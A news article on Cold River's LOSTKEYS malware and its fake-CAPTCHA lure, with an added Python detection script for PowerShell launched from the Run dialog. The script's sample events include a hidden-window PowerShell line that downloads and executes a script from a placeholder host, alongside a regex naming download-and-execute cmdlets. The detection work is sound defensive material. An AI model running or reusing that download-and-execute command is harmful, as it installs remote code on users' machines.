Russian Cyber Group Cold River Deploys New Malware to Target Western Figures
Google has uncovered a new strain of malware, “LOSTKEYS,” linked to the Russian-aligned hacking group Cold River, also associated with the Russian Federal Security Service (FSB).
The malware represents a significant escalation in the group’s cyber espionage activities, targeting sensitive figures and organisations to steal files and system data.
What Is LOSTKEYS and How Does It Work?
LOSTKEYS is designed to infiltrate systems stealthily, extracting specific files such as documents, spreadsheets, and login credentials.
The malware’s capabilities extend to collecting valuable system information, which is then transmitted back to Cold River’s operators.
According to Google’s Wesley Shields, LOSTKEYS “marks a new development in the toolset” of the hacking group, enabling them to broaden their espionage toolkit.
The malware operates with remarkable precision, targeting particular files stored in designated directories, all while remaining undetected.
Its stealthy approach allows Cold River to gather critical intelligence without alerting its targets, making it a highly effective tool in their cyber operations.
Cold River’s Long History of High-Profile Cyber Attacks
Cold River, previously identified under various aliases, has a long track record of cyberattacks aimed at high-profile individuals and institutions across the West.
The group is primarily focused on gathering intelligence to advance Russian geopolitical interests.
Between January and April 2025, Cold River targeted current and former Western government advisers, along with military personnel, journalists, and members of international think tanks.
Notably, individuals with links to the Ukraine conflict have also been on the group’s radar.
These ongoing attacks align with Cold River’s strategic objective: intelligence collection.
How Cold River Targets Victims with Deceptive Tactics
The deployment of LOSTKEYS begins with a fake CAPTCHA page.
This page tricks the user into executing a malicious command, which sets the malware in motion.
After the user interacts with it, malicious PowerShell code is copied to their clipboard, and they are then tricked into pasting and running it through the Windows Run dialog.
Once the command is executed, the malware begins downloading and installing on the target device, starting with a verification step that checks the device before the payload is delivered.
Once installed, LOSTKEYS runs silently in the background, extracting sensitive files, login details, and system data without alerting the user.
This advanced targeting system ensures that the malware is deployed only on high-value targets, maximising the impact of each attack.
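The chain described above (fake CAPTCHA, PowerShell copied to the clipboard, pasted into the Run dialog) leaves two observable traces on an endpoint: a PowerShell process whose parent is explorer.exe, and an entry under the Run dialog's RunMRU registry key. The following detection logic is an added example and is not code from Google's report or from the campaign; the process events, registry values and the download URL in them are constructed samples, not indicators from this page.

```python
"""Flag PowerShell launched from the Windows Run dialog with download or
hidden-window switches, the execution pattern of the fake-CAPTCHA chain.
All events and registry values below are constructed samples."""
from __future__ import annotations
import re
from dataclasses import dataclass

# Switches and cmdlets typical of a pasted one-liner that fetches a second stage.
SUSPICIOUS_CMDLINE = re.compile(
    r"(-w(indowstyle)?\s+hidden"          # hide the console window
    r"|-e[a-z]*\s+[A-Za-z0-9+/=]{20,}"    # -enc / -EncodedCommand <base64>
    r"|invoke-webrequest|\biwr\b"         # download
    r"|invoke-expression|\biex\b"         # execute downloaded text
    r"|downloadstring)",
    re.IGNORECASE,
)


@dataclass
class ProcessEvent:
    """Minimal process-creation record (Sysmon EID 1 / Windows 4688 style)."""
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def is_run_dialog_powershell(ev: ProcessEvent) -> bool:
    """True when PowerShell was spawned by explorer.exe, which is how commands
    typed into the Run dialog are launched, and the command line carries
    download or hidden-window indicators."""
    if _basename(ev.parent_image) != "explorer.exe":
        return False
    if _basename(ev.image) not in ("powershell.exe", "pwsh.exe"):
        return False
    return bool(SUSPICIOUS_CMDLINE.search(ev.command_line))


def scan_events(events: list[ProcessEvent]) -> list[ProcessEvent]:
    return [e for e in events if is_run_dialog_powershell(e)]


def flag_runmru(values: dict[str, str]) -> list[str]:
    """The Run dialog records each command it executed as a value under
    HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU
    (data ends in '\\1'). Return the entries that invoke PowerShell."""
    return [
        data for name, data in values.items()
        if name != "MRUList" and re.search(r"powershell|pwsh", data, re.I)
    ]


# Constructed sample telemetry; captcha-check.example is a placeholder host.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell -w hidden -NoProfile -c "iwr http://captcha-check.example/v.ps1 | iex"'),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\notepad.exe", "notepad.exe"),
    ProcessEvent(r"C:\Program Files\Microsoft VS Code\Code.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -NoProfile -c Get-ChildItem"),      # dev tooling, not Run dialog
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell"),                                  # interactive, no indicators
]

SAMPLE_RUNMRU = {
    "a": 'powershell -w hidden -c "iwr http://captcha-check.example/v.ps1 | iex"\\1',
    "b": "cmd\\1",
    "MRUList": "ab",
}

if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS):
        print("process hit:", hit.command_line)
    for entry in flag_runmru(SAMPLE_RUNMRU):
        print("RunMRU hit:", entry)
```

The parent-process check is what separates this pattern from ordinary PowerShell use: scripts run by developers, schedulers or management agents do not have explorer.exe as their parent together with download and hidden-window switches. The RunMRU check is useful in forensics after the fact, since the key persists even when process telemetry was not being collected.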
Cold River’s Past Operations: From Nuclear Labs to Email Leaks
Cold River has previously garnered attention for its bold and audacious operations.
In mid-2022, the group was accused of launching cyberattacks on three nuclear research facilities in the United States.
Later in the same year, it was implicated in the leak of private emails belonging to former British intelligence chief Sir Richard Dearlove, as well as several individuals tied to pro-Brexit activities.
These operations were part of a broader effort to gather intelligence on sensitive geopolitical issues, furthering Russian interests.
The continued evolution of Cold River’s cyber capabilities, including the use of the LOSTKEYS malware, marks a troubling escalation in the sophistication of state-sponsored hacking operations.
Cybersecurity Experts Warn of Growing Threat
The rise of LOSTKEYS has prompted cybersecurity experts to raise alarms about the growing threat posed by state-sponsored hacking groups like Cold River.
As these groups refine their tactics, organisations and individuals in sensitive sectors, particularly those involved in political and military activities, are increasingly vulnerable to attacks aimed at stealing confidential information.
Google’s Threat Intelligence Group has urged targeted organisations to adopt stronger security measures, including regular updates to their systems and enhanced monitoring protocols, to mitigate the risks posed by such sophisticated cyber threats.